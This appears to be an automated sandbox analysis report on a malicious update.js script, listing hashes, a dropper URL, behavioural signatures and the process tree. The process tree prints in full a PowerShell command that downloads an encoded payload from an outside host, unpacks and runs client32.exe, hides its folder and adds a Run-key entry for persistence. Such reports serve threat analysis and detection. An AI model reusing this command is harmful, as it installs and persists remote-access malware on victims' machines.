Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
18-04-2024 15:31
Static task
static1
Behavioral task
behavioral1
Sample
update.js
Resource
win7-20240221-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
update.js
Resource
win10v2004-20240412-en
windows10-2004-x64
11 signatures
150 seconds
General
-
Target
update.js
-
Size
14.0MB
-
MD5
f5939cb008c6b2f0b14ada53776fe570
-
SHA1
1f536bd1399548d04aa0b4b6a74d5a8c12e3c643
-
SHA256
a6125ebaa40f9c6eb9fe9b753c9f066e43713cab31c464d1601f7a2abdbe7c02
-
SHA512
a5ccbc4ef7cd0f5a5ce34852fc4596573d1445a5563facb767d155371203916fd29d5ba2ab56507fed52e0c6979083a905f5cd9f8f579b5e709d7ae2f428ed61
-
SSDEEP
49152:87V7zjCxbzqHlp4LhyN0kghDzLZzjYzYsmCW+8z2V35//9SGGqHm3quVIKXgxcER:m
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
https://beautyservicenearme.com/data.php?8838
exe.dropper
https://beautyservicenearme.com/data.php?8838
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2096 powershell.exe 6 2096 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2096 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2096 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1736 wrote to memory of 2096 1736 wscript.exe 28 PID 1736 wrote to memory of 2096 1736 wscript.exe 28 PID 1736 wrote to memory of 2096 1736 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\update.js1⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UcZctLCmEtbcnvSYsTGhPQubtWwaaIDl='https://beautyservicenearme.com/data.php?8838';$MoIFydvsffaOFrkbuhxurBLYbzH=(New-Object System.Net.WebClient).DownloadString($UcZctLCmEtbcnvSYsTGhPQubtWwaaIDl);$IgFsyQktTRAIEbAiPQTXmgSkFbxoHRq=[System.Convert]::FromBase64String($MoIFydvsffaOFrkbuhxurBLYbzH);$zxc = Get-Random -Minimum -5 -Maximum 17; $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -PathType Container)) { New-Item -Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -ItemType Directory };$p=Join-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF 'BB.zip';[System.IO.File]::WriteAllBytes($p,$IgFsyQktTRAIEbAiPQTXmgSkFbxoHRq);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -Force; $AZ.attributes='Hidden';$s=$EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE_C';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-